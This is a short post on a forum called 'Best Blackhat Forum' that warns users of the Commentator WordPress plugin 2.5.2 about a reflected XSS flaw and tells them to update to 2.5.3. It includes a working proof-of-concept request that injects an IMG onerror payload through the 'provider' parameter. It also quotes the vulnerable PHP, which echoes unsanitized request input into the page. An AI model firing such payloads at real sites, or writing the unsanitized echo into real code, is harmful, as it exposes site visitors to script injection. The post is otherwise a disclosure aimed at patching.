Best Blackhat Forum

Full Version: [Warn] Commentator WordPress Plugin User
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
All the Commentator WordPress Plugin listen carefully

Version: 2.5.2

Security all ready fix on new version 2.5.3

Please all the member update to new version

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.


----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>


----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php

line:441
$provider_name = $_REQUEST["provider"];

line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">

[img]
http://s24.postimg.org/gmcl5ibqt/commentatorxsspoc.png[/img]
Reference URL's